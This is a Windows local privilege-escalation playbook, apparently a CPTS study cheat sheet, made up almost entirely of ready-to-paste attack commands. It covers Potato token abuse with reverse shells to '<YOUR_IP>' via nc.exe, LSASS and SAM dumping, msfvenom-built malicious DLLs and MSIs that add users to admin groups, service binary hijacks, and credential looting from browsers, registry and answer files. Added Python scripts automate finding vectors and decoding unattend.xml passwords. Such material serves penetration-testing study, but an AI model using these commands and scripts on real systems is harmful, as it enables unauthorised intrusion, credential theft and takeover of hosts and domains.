Windows Privilege Escalation
The full CPTS Windows local privesc playbook, grouped by the class of vector you found: Enumeration → User Privileges (token abuse) → Group Privileges → Attacking the OS → Credential Theft. Token privileges (SeImpersonate Potatoes, SeDebug, SeTakeOwnership, SeBackup), privileged groups (DnsAdmins, Hyper-V, Server/Print Operators, Event Log Readers), service/UAC/kernel misconfigs, and local credential looting (files, cmdkey, DPAPI, browsers, LaZagne). Every payload is its own copy block. The domain kill chain lives in AD Attacks.
The flow on a Windows host: enumerate, then match what you found to a vector class below — a token privilege (whoami /priv), a privileged group (whoami /groups), an OS/service misconfiguration, or stored credentials. Each section is named for the class of technique inside it, so the Contents panel doubles as a checklist. Once you recover domain creds or a hash, continue in the AD Attacks bank.
Enumeration & Situational Awareness
Automated tools
winPEAS:
winPEASx64.exe
SharpUp (service/ACL audit):
SharpUp.exe audit
PowerUp:
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
Seatbelt:
Seatbelt.exe -group=all
Host & network info
Interfaces / DNS:
ipconfig /all
ARP table:
arp -a
Routing table:
route print
Detailed config (build number for kernel exploits):
systeminfo
Installed patches:
wmic qfe get Caption,Description,HotFixID,InstalledOn
Installed programs (Win32_Product is slow and triggers an MSI consistency check on every package; the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall are quieter):
wmic product get name,version
Network connections:
netstat -ano
Find the process listening on a port:
netstat -aon | findstr :8080
Defences in place
Defender status:
Get-MpComputerStatus
AppLocker policy:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test if a path is AppLocker-blocked:
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Users, groups & privileges
Your privileges (the money check — drives the User Privileges section):
whoami /priv
Your groups (drives the Group Privileges section):
whoami /groups
Logged-in users:
query user
All local users:
net user
A group’s members:
net localgroup administrators
Password policy:
net accounts
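Offline triage of the two "money checks" above, as an added example that is not code from the original page: paste the output of whoami /priv and whoami /groups into the two strings and the script maps what you hold to the vector classes this playbook is organised by (token privilege, privileged group, filtered admin token at Medium integrity, or nothing). WHOAMI_PRIV and WHOAMI_GROUPS are constructed samples shaped like real whoami output (the domain SID is made up); the privilege and group tables are this page's own list.

```python
"""Offline triage of `whoami /priv` and `whoami /groups` output.

Added example, not code from the original page. WHOAMI_PRIV / WHOAMI_GROUPS are
constructed samples shaped like real whoami output (the domain SID is made up)."""
import re

# Token privileges with an escalation path on this page. Presence is what matters:
# a privilege shown as Disabled is enabled by the tool that abuses it.
PRIV_VECTORS = {
    "SeImpersonatePrivilege": "Potato (PrintSpoofer / JuicyPotato / GodPotato) -> SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "Potato (PrintSpoofer / JuicyPotato / GodPotato) -> SYSTEM",
    "SeDebugPrivilege": "dump LSASS, or psgetsys.ps1 off winlogon's PID",
    "SeTakeOwnershipPrivilege": "takeown + icacls on a protected file",
    "SeBackupPrivilege": "reg save SAM + SYSTEM (NTDS.dit via shadow copy on a DC)",
    "SeRestorePrivilege": "reg save SAM + SYSTEM (NTDS.dit via shadow copy on a DC)",
    "SeLoadDriverPrivilege": "load a vulnerable signed driver (Capcom.sys)",
}

# Groups with an escalation path on this page (name without the domain/BUILTIN prefix).
GROUP_VECTORS = {
    "DnsAdmins": "ServerLevelPluginDll -> DLL runs as SYSTEM inside the DNS service",
    "Hyper-V Administrators": "maintenanceservice.exe hijack via the hard-link trick",
    "Print Operators": "SeLoadDriverPrivilege -> vulnerable driver",
    "Server Operators": "sc config a service binPath on the DC",
    "Event Log Readers": "read 4688 command lines from the Security log",
    "Backup Operators": "SeBackupPrivilege -> SAM/SYSTEM or NTDS.dit",
}

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")
INTEGRITY = re.compile(r"^Mandatory Label\\(\w+) Mandatory Level")
# name | type | SID | attributes; the type column may be followed by a single space
GROUP_LINE = re.compile(r"^(.+?)\s+(Well-known group|Alias|Group|Label)\s+(S-1-[\d-]+)\s*(.*)$")


def parse_privileges(text: str) -> dict:
    """{privilege name: 'Enabled'|'Disabled'} from `whoami /priv`."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_groups(text: str) -> tuple:
    """(group names, integrity level, names flagged 'used for deny only') from `whoami /groups`."""
    groups, deny_only, integrity = set(), set(), "unknown"
    for line in text.splitlines():
        line = line.strip()
        m = INTEGRITY.match(line)
        if m:
            integrity = m.group(1)
            continue
        m = GROUP_LINE.match(line)
        if m:
            name = m.group(1).split("\\")[-1]
            groups.add(name)
            if "deny only" in m.group(4):
                deny_only.add(name)
    return groups, integrity, deny_only


def triage(whoami_priv: str, whoami_groups: str) -> list:
    """Vectors to try, in the playbook's order: token privilege, group, UAC, then OS/creds."""
    findings = []
    for name, state in parse_privileges(whoami_priv).items():
        if name in PRIV_VECTORS:
            findings.append(f"{name} ({state}): {PRIV_VECTORS[name]}")
    groups, integrity, deny_only = parse_groups(whoami_groups)
    for name in sorted(groups):
        if name in GROUP_VECTORS:
            findings.append(f"member of {name}: {GROUP_VECTORS[name]}")
    # Admin group present but "used for deny only" at Medium = UAC-filtered token.
    if "Administrators" in deny_only and integrity == "Medium":
        findings.append("local admin at Medium integrity (filtered token): UAC bypass")
    if not findings:
        findings.append("no token/group vector: weak services, AlwaysInstallElevated, kernel, then credential loot")
    return findings


# Constructed sample output (not from a real host).
WHOAMI_PRIV = r"""
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

WHOAMI_GROUPS = r"""
GROUP INFORMATION
-----------------

Group Name                             Type             SID                                            Attributes
====================================== ================ ============================================== ==================================================
Everyone                               Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                   Group used for deny only
BUILTIN\Users                          Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Event Log Readers              Alias            S-1-5-32-573                                   Mandatory group, Enabled by default, Enabled group
INLANEFREIGHT\DnsAdmins                Group            S-1-5-21-1111111111-2222222222-3333333333-1101 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
"""

if __name__ == "__main__":
    for finding in triage(WHOAMI_PRIV, WHOAMI_GROUPS):
        print(finding)
```

The sample deliberately shows the common real-world combination: SeImpersonate from a service account plus a filtered Administrators token, where the Potato is the faster win than a UAC bypass.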
Local services & named pipes
Running services:
tasklist /svc
List named pipes:
gci \\.\pipe\
Check a pipe’s DACL for writable access:
accesschk.exe -accepteula -w \pipe\WindscribeService -v
User Privileges (Token Abuse)
You hold a sensitive token privilege in whoami /priv: abuse it for a SYSTEM shell. A privilege shown as Disabled still counts, because the tools below enable it themselves.
SeImpersonate / SeAssignPrimaryToken — Potatoes
PrintSpoofer:
PrintSpoofer.exe -i -c cmd
JuicyPotato (catch with a listener):
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <YOUR_IP> 8443 -e cmd.exe" -t *
GodPotato (covers the Windows 10 1809+ / Server 2019+ builds where JuicyPotato no longer works):
GodPotato-NET4.exe -cmd "cmd /c whoami"
If the privilege belongs to a service account whose creds you hold (e.g. the MSSQL service account, which has SeImpersonate), connect to SQL and run the Potato through xp_cmdshell:
mssqlclient.py sql_dev@<TARGET> -windows-auth
Enable command exec:
enable_xp_cmdshell
Run the Potato through it:
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <YOUR_IP> 8443 -e cmd"
SeDebugPrivilege — dump LSASS / impersonate SYSTEM
Dump LSASS:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Parse it offline in mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Or impersonate a SYSTEM parent process (psgetsys.ps1). Load it:
. .\psgetsys.ps1
Spawn SYSTEM from winlogon’s PID (find it with Get-Process winlogon; 608 below is an example value):
ImpersonateFromParentPid -ppid 608 -command "C:\Windows\System32\cmd.exe" -cmdargs ""
SeTakeOwnershipPrivilege — seize a target file
Enable all token privileges first (SeTakeOwnershipPrivilege is present but Disabled; confirm with whoami /priv afterwards):
Import-Module .\Enable-Privilege.ps1; .\EnableAllTokenPrivs.ps1
Take ownership of a target file:
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
Grant yourself full control:
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant <user>:F
Read it:
cat 'C:\Department Shares\Private\IT\cred.txt'
SeBackupPrivilege / SeRestorePrivilege — steal the SAM
Works from any shell where the privilege is present (Backup Operators). The SAM holds only local accounts; on a DC, copy NTDS.dit out of a diskshadow snapshot with robocopy /B and dump it with the same tool.
Save the SAM hive:
reg save hklm\sam C:\temp\sam.hive
Save the SYSTEM hive:
reg save hklm\system C:\temp\system.hive
Dump hashes from them:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Group Privileges
You’re a member of a privileged group in whoami /groups — each maps to a specific escalation.
Event Log Readers — read logged command lines
Search the Security log for command lines carrying a password (needs process-creation auditing with command-line logging enabled; otherwise 4688 events carry no command line):
wevtutil qe Security /rd:true /f:text | Select-String "/user"
Get-WinEvent for 4688 process-creation events:
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
DnsAdmins — malicious DLL as the DNS service
Build a malicious DLL:
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Load it as the DNS service plugin (run on the DC, or give dnscmd the DC name as its first argument, with a path the DNS server can read):
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Restart DNS to trigger it (the service runs as SYSTEM; afterwards delete the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, or the DNS service keeps failing to start):
sc.exe stop dns && sc.exe start dns
Hyper-V Administrators — hijack the maintenance binary
Take ownership of the Mozilla maintenance binary (the ownership comes from the hard-link abuse on VM deletion, CVE-2018-0952 / CVE-2019-0841, not from the group itself), then overwrite it with your payload:
takeown /F "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Start the service (runs your replaced binary as SYSTEM):
sc.exe start MozillaMaintenance
Print Operators (SeLoadDriverPrivilege) — load a vulnerable driver
Load the vulnerable but signed Capcom driver (EoPLoadDriver enables the privilege and registers the driver under HKCU; that HKCU path stopped working in Windows 10 1803 / Server 2019, and HVCI blocks the driver). Then run the matching Capcom exploit (ExploitCapcom.exe) for a SYSTEM shell:
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
Server Operators — repoint a service binary
Inspect the service:
sc qc AppReadiness
Repoint the binary to add yourself to admins:
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start it (expect error 1053 because cmd.exe is not a real service; the command has already run):
sc start AppReadiness
Then dump the DC hashes:
impacket-secretsdump server_adm@<TARGET> -just-dc-user administrator
Attacking the OS
No special token or group — abuse a service, registry or kernel misconfiguration instead.
Permissive service-binary ACL
Check the binary’s ACL (look for (F), (M) or (W) granted to BUILTIN\Users, Everyone or Authenticated Users):
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Back up the original, replace the binary, then restart the service to run it (if you can’t restart it, wait for a reboot, or reboot yourself if you hold SeShutdownPrivilege):
sc start SecurityService
Weak service permissions
Check the service with accesschk:
accesschk.exe /accepteula -quvcw WindscribeService
Change the binary path (sc needs the space after binPath=):
sc config WindscribeService binPath= "cmd /c net localgroup administrators htb-student /add"
Stop the service:
sc stop WindscribeService
Start it to trigger:
sc start WindscribeService
Unquoted service paths
Find them (an unquoted path with spaces outside C:\Windows is exploitable if you can write to a directory along it, e.g. drop C:\Program.exe; confirm each directory with icacls, and remember you still need to restart the service or reboot):
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
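The hijack candidates an unquoted path produces, as an added example that is not code from the original page: paste the wmic listing into SAMPLE_WMIC and the script lists, per service, the file Windows would try before the real binary (in lookup order) and the directory you must be able to write to. The listing below is a constructed sample; the rule applied is the one the service control manager follows for an unquoted ImagePath with spaces: at each space it first tries the prefix as the executable.

```python
"""Added example, not code from the original page: hijack candidates for
unquoted service paths from a `wmic service get name,pathname,startmode` listing.
SAMPLE_WMIC is constructed."""
import re
from pathlib import PureWindowsPath

SAMPLE_WMIC = r"""Name                       PathName                                                                     StartMode
Spooler                    C:\Windows\System32\spoolsv.exe                                              Auto
GVFS.Service               "C:\Program Files\GVFS\GVFS.Service.exe"                                     Auto
SecurityService            C:\Program Files (x86)\PCProtect\SecurityService.exe                         Auto
WindscribeService          C:\Program Files (x86)\Windscribe\WindscribeService.exe -s                   Manual
SystemExplorerHelpService  C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe   Auto
"""

SERVICE_LINE = re.compile(r"^(\S+)\s+(.+?)\s+(Auto|Manual|Disabled|Boot|System)\s*$")
FIRST_EXE = re.compile(r"^(.*?\.exe)(?:\s|$)", re.IGNORECASE)   # path up to the first .exe, args dropped


def parse_services(wmic_text: str) -> list:
    """[(name, pathname, startmode)] from the wmic listing (header line skipped)."""
    out = []
    for line in wmic_text.splitlines()[1:]:
        m = SERVICE_LINE.match(line.strip())
        if m:
            out.append(m.groups())
    return out


def hijack_candidates(pathname: str) -> list:
    """Executables Windows would try before the real one, in lookup order.

    Empty for quoted paths, paths without spaces, and anything under C:\\Windows
    (not writable by standard users, so not worth listing)."""
    if pathname.startswith('"'):
        return []
    m = FIRST_EXE.match(pathname)
    if not m:
        return []
    exe = m.group(1)
    if exe.lower().startswith("c:\\windows\\"):
        return []
    # "C:\Program Files (x86)\Vendor App\svc.exe" -> C:\Program.exe, C:\Program Files.exe,
    # C:\Program Files (x86)\Vendor.exe: every prefix that ends at a space, plus .exe.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(wmic_text: str) -> list:
    """One record per candidate: service, start mode (can you restart it, or is it a
    reboot?), the file to drop, and the directory you need write access to."""
    findings = []
    for name, pathname, mode in parse_services(wmic_text):
        for drop in hijack_candidates(pathname):
            findings.append({
                "service": name,
                "start": mode,
                "drop": drop,
                "need_write_to": str(PureWindowsPath(drop).parent),
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_WMIC):
        print(f'{f["service"]:<26} {f["start"]:<7} drop {f["drop"]}  (needs write to {f["need_write_to"]})')
```

The root of C: normally lets standard users create folders but not files, so C:\Program.exe and C:\Program Files.exe are usually dead ends; the candidates deeper in the path (a vendor directory with a sloppy ACL) are where this pays off, which is why each need_write_to directory gets an icacls check before anything is dropped.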
AlwaysInstallElevated
Both values must be 0x1 (if either is missing or 0 the MSI does not run elevated). HKLM:
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKCU:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Build a malicious MSI:
msfvenom -p windows/x64/exec cmd='net localgroup administrators <user> /add' -f msi -o evil.msi
Run it elevated:
msiexec /quiet /qn /i evil.msi
UAC bypass
Is UAC enabled (EnableLUA 0x1; only relevant when you are in local Administrators but at Medium integrity, i.e. whoami /groups lists the group as used for deny only):
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
UAC level (ConsentPromptBehaviorAdmin 0x0 = elevate silently, 0x5 = default consent prompt):
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
Windows build (match against UACME techniques):
[environment]::OSVersion.Version
Kernel exploits
Check installed patches:
wmic qfe list brief
Check SAM readability (HiveNightmare / CVE-2021-36934: BUILTIN\Users with (RX) means the hive can be read out of a volume shadow copy):
icacls c:\Windows\System32\config\SAM
Credential Theft
Loot credentials stored on the host. Recovered passwords and hashes feed Password Attacks (lateral movement) and the AD Attacks kill chain.
Credential files & history
Files containing “password”:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Recursive file-extension hunt:
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Unattend / sysprep answer files (also look under C:\Windows\Panther\Unattend\ and for sysprep.xml / sysprep.inf; a Base64 <Value> decodes to the UTF-16 password with a trailing “Password” suffix):
dir /s /b C:\unattend.xml C:\Windows\Panther\Unattend.xml
PowerShell history (current user):
gc (Get-PSReadLineOption).HistorySavePath
PowerShell history (all users):
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Decrypt a saved PowerShell credential:
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'; $credential.GetNetworkCredential().password
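Decoding what an answer file actually stores, as an added example that is not code from the original page: when <PlainText> is false, the <Value> under AutoLogon/Password, UserAccounts/AdministratorPassword or a LocalAccount/Password is Base64 of the UTF-16LE password with the literal string "Password" appended (the suffix belongs to the answer-file format, not to the secret), and the script below strips it and pairs each password with its account. SAMPLE_UNATTEND is a constructed file, not a real leaked one; the _encode_as_setup_does helper exists only to build that fixture the way setup writes it.

```python
"""Added example, not code from the original page: recover passwords from
unattend.xml / sysprep answer files. SAMPLE_UNATTEND is constructed."""
import base64
import xml.etree.ElementTree as ET

NS = {"u": "urn:schemas-microsoft-com:unattend"}


def _encode_as_setup_does(password: str) -> str:
    """Fixture helper only: Base64(UTF-16LE(password + "Password")), as setup stores it."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>{_encode_as_setup_does("Summer2024!")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>localadmin</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Welcome1</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>{_encode_as_setup_does("Build-Pa55")}</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def decode_value(value: str, plaintext) -> str:
    """Password from a <Value>; plaintext=None means the file had no <PlainText> tag."""
    if plaintext:
        return value
    try:
        raw = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return value                      # not Base64 after all: treat as cleartext
    if plaintext is None and not raw.endswith("Password"):
        return value                      # no tag and no setup suffix: it was cleartext
    return raw[:-len("Password")] if raw.endswith("Password") else raw


def extract_passwords(xml_text: str) -> list:
    """[{'user','password','where'}] for every element holding a <Value>."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    found = []
    for holder in root.iter():
        value = holder.find("u:Value", NS)
        if value is None or not (value.text or "").strip():
            continue
        pt = holder.find("u:PlainText", NS)
        plaintext = None if pt is None else (pt.text or "").strip().lower() == "true"
        where = holder.tag.split("}")[-1]
        if where == "AdministratorPassword":
            user = "Administrator"
        else:
            # AutoLogon carries <Username>, LocalAccount carries <Name>, beside the <Password>.
            owner = parent.get(holder)
            u = None if owner is None else owner.find("u:Username", NS)
            if u is None and owner is not None:
                u = owner.find("u:Name", NS)
            user = (u.text or "").strip() if u is not None else "?"
        found.append({"user": user, "password": decode_value(value.text.strip(), plaintext), "where": where})
    return found


if __name__ == "__main__":
    for hit in extract_passwords(SAMPLE_UNATTEND):
        print(f'{hit["where"]:<22} {hit["user"]:<14} {hit["password"]}')
```

Point extract_passwords at the text of any unattend.xml, sysprep.xml or Panther\Unattend.xml you find; a value that does not decode (no suffix, not Base64) is returned unchanged, so a cleartext password is never silently mangled into garbage.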
Saved & cached credentials
Saved credentials:
cmdkey /list
Run as a saved credential:
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
AutoLogon cleartext password in the registry (look at the DefaultUserName and DefaultPassword values):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PuTTY saved sessions (ProxyPassword is stored in cleartext, so recurse into each session):
reg query HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions /s
Browser, app & database creds
Chrome saved logins:
SharpChrome.exe logins /unprotect
Sticky Notes database (SQLite, so don’t type it; copy plum.sqlite with its -wal and -shm files and read the Text column of the Note table, or run strings over them):
copy %LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite* C:\temp\
Sweep everything with LaZagne:
lazagne.exe all
Extract saved PuTTY/WinSCP/RDP creds with SessionGopher:
Import-Module .\SessionGopher.ps1; Invoke-SessionGopher -Target localhost
Search a domain’s mailboxes with MailSniper (needs an account with Exchange impersonation rights):
Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname Exch01 -OutputCsv global-email-search.csv
KeePass database, extract the hash (strip the leading “Database:” filename from the output, or pass --username to hashcat):
keepass2john Database.kdbx > keepass_hash
Crack it (mode 13400 covers KeePass 1 and 2):
hashcat -m 13400 keepass_hash rockyou.txt
Order of effort: enumerate (whoami /priv + winPEAS) → cash in a token privilege (Potato) or group membership for SYSTEM → if neither, attack a weak service / UAC / kernel → then loot every credential store. Take the passwords and hashes into Password Attacks and AD Attacks.